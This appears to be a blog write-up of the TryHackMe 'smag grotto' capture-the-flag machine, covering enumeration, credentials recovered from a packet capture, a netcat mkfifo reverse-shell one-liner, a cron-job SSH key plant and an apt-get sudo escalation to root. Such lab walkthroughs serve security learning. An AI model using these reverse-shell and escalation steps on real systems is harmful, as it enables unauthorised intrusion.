
TryHackMe - smag grotto writeup

descriptionFollow the yellow brick road

smag-grotto is a tryhackme machine that is testing on enumeration, a little bit of wireshark , cron jobs and a simple privilege escalation technique. Therefore this write up entails my approach to solving the machine.

Let’s get started

Nmap scan

As always, start scanning the ports, services and also the low hanging vulns using the nmap scripts. For this case i scanned for ports and found that the machine had only two ports open, 22 (SSH) and 80 (HTTP) sudo nmap -A -sT -sV -oN nmap.txt


Visited the website and there was nothing there. I tried to look the source code as i always do but there was nothing still.


Directory bruteforcing

I then went on and scanned for the hidden directories using gobuster, if present. woow!! i found mail gobuster dir -e -u http://[targetIP] -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php -t 50 | tee gobustlog


Visiting the mail directory, i found email messages and a packet capture file. Also checking on the usernames, i realized that they were using smag.thm so i went on and added the domain to my /etc/hosts file.


Then i downloaded the .pcap file to my machine and opened it using wireshark.


Read the packet by right-clicking and follow the tcp stream. And there were login credentials. but for which platform? because i did not find any login directory. Checking on the header, there is login form for the host development.smag.thm.


Initial access

I went back to my hosts file and added the development subdomain, visited the login.php entered the credentials. They worked, and now much interesting was directed to a page that was executing system commands, more of a webshell. what now? a reverse shell? probably. i tried the netcat one-liner command. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [yourIP]1234 >/tmp/f


and waited for the machine to connect by starting a netcat listener in my terminal nc -nlvp 1234 and I got the connection under the user www-data.


Privesc - User

I could not do anything like retrieving the flags under this user, so i thought of downloading linpeas from my machine. I started python3 server and used wget to download the file in /tmp.


I made it executable by running chmod +x and ran it ./ cron jobs!!!!..there was an interesting cron job that was being executed as root. It is basically copy the contents of the file to jakes’s authorised_keys most probably the public key.


To use that to my benefit, i used ssh-keygen to create my own ssh public key and copied it to the /opt/.backups/ and then went on to login to the jake’s ssh account using my own private key(id_rsa).


User flag

cat and submit the user flag.


Privesc - Root

Getting to root? of course, i needed to escalate my privileges to root. How? i tried sudo -l and that’s all, user jake was allowed to run the apt-get binary as root.


So i headed to GTFOBins and searched for the binary. i got a command, executed it and i got the root shell….how 34sy!!!!

root flag

cat /root/root.txt


i hoped you enjoyed the write up:)

thank you fam!!!!!!!!!!!!!!!!!!

This post is licensed under CC BY 4.0 by the author.